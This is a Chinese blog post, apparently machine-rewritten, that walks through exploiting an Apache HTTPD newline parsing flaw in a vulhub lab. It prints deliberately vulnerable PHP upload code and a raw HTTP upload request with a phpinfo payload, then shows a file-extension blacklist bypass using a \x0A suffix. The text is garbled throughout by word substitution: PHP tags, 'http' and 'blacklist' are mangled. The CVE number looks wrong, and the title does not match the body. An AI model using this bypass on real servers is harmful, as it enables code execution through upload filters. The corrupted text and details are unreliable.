织梦垂直越权到提取拿站
Apache
Apache HTTPD 换行分析系统漏洞
系统漏洞序号CVE-2018-15715
Apache HTTPD是这款.com网络服务器,它能够根据Mod_php来运作PHP网页页面。其2.4.0~2.4.29版本号中存有1个分析系统漏洞,在分析PHP时,1.php\x0A将被依照PHP尾缀开展分析,造成绕开某些网络服务器的安全策略。
基本原理:在分析PHP时,1.php\x0A将被依照PHP尾缀开展分析。
自然环境构建
运用vulhub构建
进到vulhub相对的文件夹名称
docker-compose build
docker-compose up -d
运用方式 例如总体目标存有1个发送的逻辑性
全句智能化原創php
if(isset($_FILES['file'])) {
$name = basename($_POST['name']);
$ext = pathinfo($name,PATHINFO_EXTENSION);
if(In_array($ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {
exit('bad file');
}
move_uploaded_file($_FILES['file']['tmp_name'], './' . $name);
}
看得见,这儿采用了信用黑名单,要是发觉尾缀在信用黑名单中,则开展阻拦。
将所述编码置放在器皿内的/var/WWW/html语言文件目录下,设定好写管理权限,只能开展检测。
发送一切正常的PHP文档,被阻拦
POST / .com/1.2
Host: 10.10.10.131:8080
Connection: keep-alive
Content-Length: 357
Cache-Control: max-age=0
Origin: [url].com://10.10.10.131:8080[/url]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (Windows Nt 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 谷歌浏览/58.0.3029.96 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6TAB8KxvuJTZYfUn
Accept: text/html语言,application/xhtml+xml,application/xml;q=0.8,image/webp,*/*;q=0.7
Referer: .com://localhost:8080/day1701/form2.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.7
Cookie: JSESSIONID=725FA8D1C3EBECCFE80A28CF8A761E20
------WebKitFormBoundary6TAB8KxvuJTZYfUn
Content-Disposition: form-data; name="name"
1.php
------WebKitFormBoundary6TAB8KxvuJTZYfUn
Content-Disposition: form-data; name="file"; filename="1.gif"
全句智能化原創php phpinfo();?>
------WebKitFormBoundary6TAB8KxvuJTZYfUn--
能够发送1.php.xxx,可是不分析,表明老的Apache分析系统漏洞找不到。
赶到网络服务器看下
老的分析系统漏洞找不到
人们运用CVE-2018-15715,发送1个包括换行符的文档。特别注意,只有是\x0A,不可以是\x0D\x0A,因此人们用hex作用在1.php后边加上1个\x0A:
发送取得成功
接下去人们浏览 [url].com://10.10.10.131:8080/1.php%0A[/url] ,取得成功分析
修补方式
升级版本号,打补丁。
备注名称
获得文件夹名称时不可以用$_FILES['file']['name'],由于他会全自动把换行除掉,这一点儿有点儿可有可无 默认设置的Apache配备只能运用,由于默认设置Apache配备就应用了:
php$>
SetHandler application/x-httpd-php
参照p
相关文章
- 3条评论
- 酒奴听弧2022-05-31 14:10:38
- /localhost:8080/day1701/form2.jspAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.7Cookie: JSESSIONID=725FA8D1C3EBECCF
- 痛言唔猫2022-05-31 07:30:12
- t: 10.10.10.131:8080Connection: keep-aliveContent-Length: 357Cache-Control: max-age=0Origin: [url].com://10.10.10.131:8080[/u
- 馥妴七禾2022-05-31 17:29:50
- ddocker-compose up -d运用方式 例如总体目标存有1个发送的逻辑性全句智能化原創phpif(isset($_FILES['file']))